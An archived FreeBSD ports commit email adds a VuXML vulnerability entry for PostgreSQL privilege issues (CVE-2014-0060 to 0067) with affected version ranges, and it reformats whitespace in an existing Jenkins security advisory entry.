Date: Thu, 20 Feb 2014 18:11:25 +0000 (UTC) From: Palle Girgensohn <girgen@FreeBSD.org> To: ports-committers@freebsd.org, svn-ports-all@freebsd.org, svn-ports-head@freebsd.org Subject: svn commit: r345256 - head/security/vuxml Message-ID: <201402201811.s1KIBPYr083849@svn.freebsd.org>
next in thread | raw e-mail | index | archive | help
Author: girgen Date: Thu Feb 20 18:11:25 2014 New Revision: 345256 URL: http://svnweb.freebsd.org/changeset/ports/345256 QAT: https://qat.redports.org/buildarchive/r345256/ Log: The PostgreSQL Global Development Group has released an important update to all supported versions of the PostgreSQL database system, which includes minor versions 9.3.3, 9.2.7, 9.1.12, 9.0.16, and 8.4.20. This update contains fixes for multiple security issues, as well as several fixes for replication and data integrity issues. All users are urged to update their installations at the earliest opportunity, especially those using binary replication or running a high-security application. This update fixes CVE-2014-0060, in which PostgreSQL did not properly enforce the WITH ADMIN OPTION permission for ROLE management. Before this fix, any member of a ROLE was able to grant others access to the same ROLE regardless if the member was given the WITH ADMIN OPTION permission. It also fixes multiple privilege escalation issues, including: CVE-2014-0061, CVE-2014-0062, CVE-2014-0063, CVE-2014-0064, CVE-2014-0065, and CVE-2014-0066. More information on these issues can be found on our security page and the security issue detail wiki page. Security: CVE-2014-0060,CVE-2014-0061,CVE-2014-0062,CVE-2014-0063 CVE-2014-0064,CVE-2014-0065,CVE-2014-0066,CVE-2014-0067 Modified: head/security/vuxml/vuln.xml Modified: head/security/vuxml/vuln.xml ============================================================================== --- head/security/vuxml/vuln.xml Thu Feb 20 17:42:11 2014 (r345255) +++ head/security/vuxml/vuln.xml Thu Feb 20 18:11:25 2014 (r345256) @@ -51,6 +51,60 @@ Note: Please add new entries to the beg --> <vuxml xmlns="http://www.vuxml.org/apps/vuxml-1">; + <vuln vid="42d42090-9a4d-11e3-b029-08002798f6ff"> + <topic>PostgreSQL -- multiple privilege issues</topic> + <affects> + <package> + <name>postgresql-server</name> + <range><lt>8.4.20</lt></range> + <range><ge>9.0.0</ge><lt>9.0.16</lt></range> + <range><ge>9.1.0</ge><lt>9.1.12</lt></range> + <range><ge>9.2.0</ge><lt>9.2.7</lt></range> + <range><ge>9.3.0</ge><lt>9.3.3</lt></range> + </package> + </affects> + <description> + <body xmlns="http://www.w3.org/1999/xhtml">; + <p>PostgreSQL Project reports:</p> + <blockquote cite="http://www.postgresql.org/about/news/1506/">; + <p>This update fixes CVE-2014-0060, in which PostgreSQL did not + properly enforce the WITH ADMIN OPTION permission for ROLE management. + Before this fix, any member of a ROLE was able to grant others access + to the same ROLE regardless if the member was given the WITH ADMIN + OPTION permission. It also fixes multiple privilege escalation issues, + including: CVE-2014-0061, CVE-2014-0062, CVE-2014-0063, CVE-2014-0064, + CVE-2014-0065, and CVE-2014-0066. More information on these issues can + be found on our security page and the security issue detail wiki page. + </p> + <p> + With this release, we are also alerting users to a known security hole + that allows other users on the same machine to gain access to an + operating system account while it is doing "make check": + CVE-2014-0067. "Make check" is normally part of building PostgreSQL + from source code. As it is not possible to fix this issue without + causing significant issues to our testing infrastructure, a patch will + be released separately and publicly. Until then, users are strongly + advised not to run "make check" on machines where untrusted users have + accounts.</p> + </blockquote> + </body> + </description> + <references> + <cvename>CVE-2014-0060</cvename> + <cvename>CVE-2014-0061</cvename> + <cvename>CVE-2014-0062</cvename> + <cvename>CVE-2014-0063</cvename> + <cvename>CVE-2014-0064</cvename> + <cvename>CVE-2014-0065</cvename> + <cvename>CVE-2014-0066</cvename> + <cvename>CVE-2014-0067</cvename> + </references> + <dates> + <discovery>2014-02-20</discovery> + <entry>2014-02-20</entry> + </dates> + </vuln> + <vuln vid="0871d18b-9638-11e3-a371-6805ca0b3d42"> <topic>phpMyAdmin -- Self-XSS due to unescaped HTML output in import.</topic> <affects> @@ -101,48 +155,48 @@ Note: Please add new entries to the beg <li> <p>iSECURITY-105</p> <p>In some places, Jenkins XML API uses XStream to deserialize - arbitrary content, which is affected by CVE-2013-7285 reported - against XStream. This allows malicious users of Jenkins with - a limited set of permissions to execute arbitrary code inside - Jenkins master.</p> + arbitrary content, which is affected by CVE-2013-7285 reported + against XStream. This allows malicious users of Jenkins with + a limited set of permissions to execute arbitrary code inside + Jenkins master.</p> </li> <li> <p>SECURITY-76 & SECURITY-88 / CVE-2013-5573</p> <p>Restrictions of HTML tags for user-editable contents are too - lax. This allows malicious users of Jenkins to trick other - unsuspecting users into providing sensitive information.</p> + lax. This allows malicious users of Jenkins to trick other + unsuspecting users into providing sensitive information.</p> </li> <li> <p>SECURITY-109</p> <p>Plugging a hole in the earlier fix to SECURITY-55. Under some - circimstances, a malicious user of Jenkins can configure job - X to trigger another job Y that the user has no access to.</p> + circimstances, a malicious user of Jenkins can configure job + X to trigger another job Y that the user has no access to.</p> </li> <li> <p>SECURITY-108</p> <p>CLI job creation had a directory traversal vulnerability. This - allows a malicious user of Jenkins with a limited set of - permissions to overwrite files in the Jenkins master and - escalate privileges.</p> + allows a malicious user of Jenkins with a limited set of + permissions to overwrite files in the Jenkins master and + escalate privileges.</p> </li> <li> <p>SECURITY-106</p> <p>The embedded Winstone servlet container is susceptive to - session hijacking attack.</p> + session hijacking attack.</p> </li> <li> <p>SECURITY-93</p> <p>The password input control in the password parameter - definition in the Jenkins UI was serving the actual value of - the password in HTML, not an encrypted one. If a sensitive - value is set as the default value of such a parameter - definition, it can be exposed to unintended audience.</p> + definition in the Jenkins UI was serving the actual value of + the password in HTML, not an encrypted one. If a sensitive + value is set as the default value of such a parameter + definition, it can be exposed to unintended audience.</p> </li> <li> <p>SECURITY-89</p> <p>Deleting the user was not invalidating the API token, - allowing users to access Jenkins when they shouldn't be - allowed to do so.</p> + allowing users to access Jenkins when they shouldn't be + allowed to do so.</p> </li> <li> <p>SECURITY-80</p> @@ -151,52 +205,52 @@ Note: Please add new entries to the beg <li> <p>SECURITY-79</p> <p>"Jenkins' own user database" was revealing the - presence/absence of users when login attempts fail.</p> + presence/absence of users when login attempts fail.</p> </li> <li> <p>SECURITY-77</p> <p>Jenkins had a cross-site scripting vulnerability in one of its - cookies. If Jenkins is deployed in an environment that allows - an attacker to override Jenkins cookies in victim's browser, - this vulnerability can be exploited.</p> + cookies. If Jenkins is deployed in an environment that allows + an attacker to override Jenkins cookies in victim's browser, + this vulnerability can be exploited.</p> </li> <li> <p>SECURITY-75</p> <p>Jenkins was vulnerable to session fixation attack. If Jenkins - is deployed in an environment that allows an attacker to - override Jenkins cookies in victim's browser, this - vulnerability can be exploited.</p> + is deployed in an environment that allows an attacker to + override Jenkins cookies in victim's browser, this + vulnerability can be exploited.</p> </li> <li> <p>SECURITY-74</p> <p>Stored XSS vulnerability. A malicious user of Jenkins with a - certain set of permissions can cause Jenkins to store - arbitrary HTML fragment.</p> + certain set of permissions can cause Jenkins to store + arbitrary HTML fragment.</p> </li> <li> <p>SECURITY-73</p> <p>Some of the system diagnostic functionalities were checking a - lesser permission than it should have. In a very limited - circumstances, this can cause an attacker to gain information - that he shouldn't have access to.</p> + lesser permission than it should have. In a very limited + circumstances, this can cause an attacker to gain information + that he shouldn't have access to.</p> </li> </ol> <p>Severity</p> <ol> <li>SECURITY-106, and SECURITY-80 are rated <strong>high</strong>. An attacker only - needs direct HTTP access to the server to mount this attack.</li> + needs direct HTTP access to the server to mount this attack.</li> <li>SECURITY-105, SECURITY-109, SECURITY-108, and SECURITY-74 are - rated <strong>high</strong>. These vulnerabilities allow attackes with valid - Jenkins user accounts to escalate privileges in various ways.</li> + rated <strong>high</strong>. These vulnerabilities allow attackes with valid + Jenkins user accounts to escalate privileges in various ways.</li> <li>SECURITY-76, SECURIT-88, and SECURITY-89 are rated <strong>medium.</strong> - These vulnerabilities requires an attacker to be an user of - Jenkins, and the mode of the attack is limited.</li> + These vulnerabilities requires an attacker to be an user of + Jenkins, and the mode of the attack is limited.</li> <li>SECURITY-93, and SECURITY-79 are <strong>rated</strong> low. These - vulnerabilities only affect a small part of Jenkins and has - limited impact.</li> + vulnerabilities only affect a small part of Jenkins and has + limited impact.</li> <li>SECURITY-77, SECURITY-75, and SECURITY-73 are <strong>rated</strong> low. These - vulnerabilities are hard to exploit unless combined with other - exploit in the network.</li> + vulnerabilities are hard to exploit unless combined with other + exploit in the network.</li> </ol> </blockquote> </body>
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?201402201811.s1KIBPYr083849>